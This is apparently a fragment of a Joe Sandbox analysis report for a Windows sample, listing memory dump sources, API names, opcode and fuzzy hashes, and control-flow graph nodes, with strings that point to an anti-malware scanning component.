                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: ExceptionRaise_clrfp
                      • String ID:
                      • API String ID: 15204871-0
                      • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                      • Instruction ID: b9038b0b91b3d6022eca01d52c1e70e323949f827dcb94a92e00cb52f3038233
                      • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                      • Instruction Fuzzy Hash: CEB11673684B898BEB19CF6DC88636C7BA0FB84B88F158925DB5D877A4CB39D451C700
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: ByteCharErrorLastMultiWide
                      • String ID:
                      • API String ID: 203985260-0
                      • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                      • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                      • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                      • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                      • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                      • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                      • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                      • Instruction ID: 8e6788ff245f71d450c8341db95aebe565e9fbc43e516ae31c06d192fa7749c8
                      • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                      • Instruction Fuzzy Hash: 6551C422B0878195FB209BBAA8445AEBFA9FB45BD4F944135EF5C27A99DF3CD401C700
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: EntryFunctionLookup
                      • String ID:
                      • API String ID: 3852435196-0
                      • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                      • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                      • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                      • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID: 0-3916222277
                      • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                      • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                      • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                      • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: InfoLocale
                      • String ID:
                      • API String ID: 2299586839-0
                      • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                      • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                      • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                      • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID: -
                      • API String ID: 0-2547889144
                      • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                      • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                      • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                      • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID: -
                      • API String ID: 0-2547889144
                      • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                      • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                      • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                      • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                      • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                      • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                      • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID: -
                      • API String ID: 0-2547889144
                      • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                      • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                      • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                      • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID: -
                      • API String ID: 0-2547889144
                      • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                      • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                      • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                      • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID: -
                      • API String ID: 0-2547889144
                      • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                      • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                      • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                      • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                      • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                      • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                      • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                      • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                      • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                      • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                      • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                      • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                      • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                      • Instruction ID: bdc3cce6860a3e7c0c0b91eb20c51e9b051237f0da021ddd4671e0d815d93d03
                      • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                      • Instruction Fuzzy Hash: A4F036B1B596958BEBA4CF6CE842A6977D0F7483C4F94803AD78D83B14DA3C94658F04

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 355 140003d35-140003d49 353->355 356 1400039f3-140003a04 #4 354->356 357 140003a09-140003a1a EnterCriticalSection 354->357 356->357 358 140003a67 357->358 359 140003a1c-140003a34 357->359 360 140003a6c-140003a8e LeaveCriticalSection 358->360 361 140003a36 359->361 362 140003a3e-140003a49 359->362 364 140003ab4-140003abe 360->364 365 140003a90-140003aad #4 360->365 361->362 362->360 363 140003a4b-140003a65 SetEvent ResetEvent 362->363 363->360 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->355
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                      • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                      • API String ID: 1021822269-3147033232
                      • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                      • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                      • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                      • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                      • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                      • API String ID: 883923345-381368982
                      • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                      • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                      • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                      • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                      • String ID:
                      • API String ID: 1613947383-0
                      • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                      • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                      • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                      • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                      • String ID:
                      • API String ID: 1995290849-0
                      • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                      • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                      • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                      • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                      • String ID:
                      • API String ID: 1995290849-0
